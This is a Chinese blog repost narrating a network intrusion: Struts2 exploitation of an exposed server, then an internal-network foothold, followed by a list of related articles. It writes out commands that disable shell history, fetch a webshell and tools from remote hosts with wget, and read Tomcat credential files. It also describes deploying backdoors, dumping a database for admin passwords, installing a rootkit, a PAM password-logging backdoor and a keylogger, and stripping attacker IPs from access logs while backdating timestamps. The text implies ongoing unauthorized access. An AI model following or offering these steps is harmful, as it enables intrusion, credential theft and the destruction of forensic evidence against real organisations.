[原创] 一次渗透测试过程--从外网进内网

最新推荐文章于 2023-04-27 13:48:52 发布
最新推荐文章于 2023-04-27 13:48:52 发布
阅读量244 收藏
点赞数
原文链接:http://www.cnblogs.com/miaomiaoxia/p/5477195.html
版权

最近内网权限掉了,  需要重新找外网的入口进内网,
用凤凰扫描器生成字典扫了一下弱口令,人肉查看了c段上的一些web, 扫了扫端口,发现13这台机器上跑了一个wingsoft的软件, 在乌云上找到了一个漏洞, 用st2 -005 漏洞获得一个cmdshell


0x02  进入边界服务器

执行 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0  

复制代码


使系统不记录我们的操作记录
用默认的工具上不去webshell,看了下web目录, chmod 777 +r /js/  加了可写权限, 依然webshell上不去,  使用wget -O /web/js/help.jsp www.xxx.com/shell.txt  也写入不了文件

执行

  1. locate tomcat-user.xml
  2. cat /mulu/tomcat-user.xml
复制代码



找到密码以后进入tomcat后台,部署war包获取webshell,  进去了以后,部署一句话后门若干, 并修改掉文件创建的时间,开始在webshell 上收集信息,为内网渗透做准备

netstat -tlnp   //查看内网连过来那些端口

10.19.1.56

10.19.1.66
192.168.1.184

10.19.1.150 

10.22.1.222   

10.22.1.249

[size=14.399999618530273px]10.22.1.249

翻一番配置文件。找数据库在10.48.14.52 网段连接进去把裤子拖出来, 查找管理员的密码, 翻到3个管理员(*陈,刘*,彭*) 记录下他的密码,看了下

  1. python -h
  2. nmap -h  发现环境里有python环境
复制代码


insightscan.py 去扫描下 然而报错了(),上传凤凰扫描器准备增加一点权限, 上传出错, 采用文件下载的方式来安装凤凰扫描器

  1. wget -O /tmp/xx.zip http://www.baidu.com/xx.zip
  2. unzip /tmp/xx.zip 
  3. chmod 777 ff
  4. ./ff 
复制代码

提示缺少动态连接裤 (tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: No such file or directory
)百度了一下

原因一般有两个, 一个是操作系统里确实没有包含该共享库(lib*.so.*文件)或者共享库版本不对, 遇到这种情况那就去网上下载并安装上即可.
另外一个原因就是已经安装了该共享库, 但执行需要调用该共享库的程序的时候, 程序按照默认共享库路径找不到该共享库文件.
0x03 权限维持
(1)安装rootkit
安装的应用级的rootkit,基本就是一个加密的nc,配置好端口 root 和密码就可以了
(2)安装pam后门记录root密码
本地是root权限,我们需要本地的root密码,在/etc/shadow解密不了的情况下, 可以安装pam后门或者ssh后门记录root密码
  1. 获取pam版本:rpm -qa|grep pam
复制代码
http://www.nxadmin.com/system/1199.html

 

(3)安装keyloger
0x04 日志清理

 

(1) web日志的清理
  1. awk '!/123.123.123.123|111.111.111.111|phpspy.php/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log
  1. touch -amt 200901231532 文件名   这样把时间改回来
  2. 当然 也有批量修改时间的小技巧
  3. ls|xargs touch -amt 200901231532   #这句话就可以直接改时间

(2)系统日志的清理 

转载于:https://www.cnblogs.com/miaomiaoxia/p/5477195.html

weixin_30444105
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 7423
渗透测试实验,外网渗透内网穿透的详细操作过程以及内网代理和内网探测的方法
vulnstack4渗透-外网
weixin_51441054的博客
04-20 3086
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机行信息收集 发现一个ssh服...
【网络安全知识体系】外网渗透测试 | 14个小实验
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
渗透测试之流程简述
2301_77732591的博客
04-27 1977
渗透测试分为和黑盒测试,我们只知道该网站的URLNmap:一款功能强大的网络扫描和主机检测工具,可以用于收集信息、枚举、漏洞探测和安全扫描。Wireshark:一款抓包和分析网络流量的工具,可以用于监控和调试网络通信。Goby:一款新型的漏洞扫描平台,可以快速发现并利用各种漏洞,还可以联动其他工具如Xray和MSF。22——>ssh弱口令80——>HTTP服务873——>rsync 未授权访问漏洞3306——>mysql弱口令6379——>redis未授权访问漏洞。
渗透测试之常规外网打点拿下域控
zkaqlaoniao的博客
10-20 4722
目录 一、网络示意图 二、信息收集 2.0 netdiscover存活探测 2.1 端口扫描 2.2 美化NMAP扫描结果 2.3 目录扫描编写一个绕防火墙脚本 2.4 访问特殊状态码地址 三、对目标渗透测试 3.1测试Web服务器 四、内网渗透 4.1 对web 服务器的操作 4.2 对OA服务器渗透 4.3 对域控主机渗透 4.3.2 利用kiwi dcsync_ntml获取域管理员的ntml 4.4 使用CS渗透最后的域控 五、总结(有防护域控...
渗透外网测试KALI+隧道+加壳
weixin_43155143的博客
02-04 1179
渗透外网测试KALI+隧道+加壳
渗透测试 _ 内网信息收集1
08-03
收集本机信息是信息收集的第一步,无论在外网还是内网,都至关重要。一旦控制了一台机器,需要获取的信息包括: - **系统和权限**:操作系统版本、权限级别等。 - **内网配置**:IP地址段、网络配置、是否在域内。 ...
信息系统渗透测试方案.pdf
03-28
2. **攻击路径**:包括内网外网以及不同网段/VLAN间的渗透测试,确保全面覆盖。 3. **实施流程**:从方案制定、客户同意、信息收集到权限获取、权限提升、报告生成,每个步骤都应严谨执行。 4. **风险规避**:合理...
渗透测试的实施流程:明确目标、信息收集、漏洞发现、漏洞验证、后渗透测试
最新发布
08-19
在这个阶段,渗透测试小组根据上一步发现的有可能成功利用的全部漏洞都验证一遍,结合实际情况,搭建模拟环境行试验,成功后应用于目标系统中。漏洞验证方法包括自动化漏洞扫描工具结果验证、手工验证、根据公开...
网银渗透测试流程
07-12
在整个网银渗透测试过程中,关键在于全面性、深度和及时性。测试人员需要熟悉各种安全工具,理解不同类型的漏洞和其潜在危害,同时具备良好的沟通能力,以便与银行的IT团队协作,共同保障网银系统的安全性。此外,...
内网渗透文档过程有截图
07-02
3. 网卡配置:配置网卡,一个连接内网,一个连接外网,选择桥接模式,并获取 MAC 地址。 4. 防火墙设置:设置防火墙,KALI 端防火墙设为 192.168.101.1,被渗透端设为 192.168.102.1,并输入掩码长度 24,选择开启 ...
局域网IP地址扫描程序 外网IP
01-22
扫 描 局 域 网 内 所 有 计 算 机 的 IP 及 MAC 地 址
渗透测试(Penetration Testing)
weixin_30500105的博客
09-11 1122
渗透测试(Penetration Testing) 目录 Author : ZwelL Last Updated : 2007.12.16 零、前言 一、简介 二、制定实施方案 三、具体操作过程 四、生成报告 五、测试过程中的风险及规避 参考资料 FAQ集 零、前言 渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。 这里我们提供的所有渗...
一次渗透测试过程--从外网内网(原创)
weixin_30569001的博客
07-08 1688
本文首发习科:地址http://bbs.blackbap.org/thread-7483-1-1.html 最近内网权限掉了, 需要重新找外网的入口内网, 用凤凰扫描器生成字典扫了一下弱口令,人肉查看了c段上的一些web, 扫了扫端口,发现13这台机器上跑了一个wingsoft的软件, 在乌云上找到了一个漏洞, 用st2 -005 漏洞得到了可以远程执行命令的权限 0x02 进入边...
一次完整的渗透测试流程
HIM_MRY的博客
08-30 6330
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站渗透。如果我们没有经过客户的授权而对一个网站渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法 渗透测试分为白盒测试和黑盒测试 1.白盒测试就...
如何从外网穿透到内网
热门推荐
凌晨五更寒的博客
11-22 2万+
内网,也叫局域网。从范围上来讲,内网就是小部分的网络。如,最小最简单的内网就是二台电脑用网线连接起来,就是一个内网。一般的特定环境,都是内网,如学校的校园网;公司单位的局域网等。
关于渗透测试
CC's Blog
06-13 9818
今天看到某安全公司网站
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6179
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第二个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
渗透测试技术:从SQL注入到内网渗透
渗透测试中,SQL注入是一种常见的攻击手段,它源于对用户输入数据缺乏有效验证,允许攻击者通过Web接口执行恶意SQL命令。随着CGI的引入,Web应用变得更具交互性,但同时也带来了安全风险。CGI处理过程包括接收用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值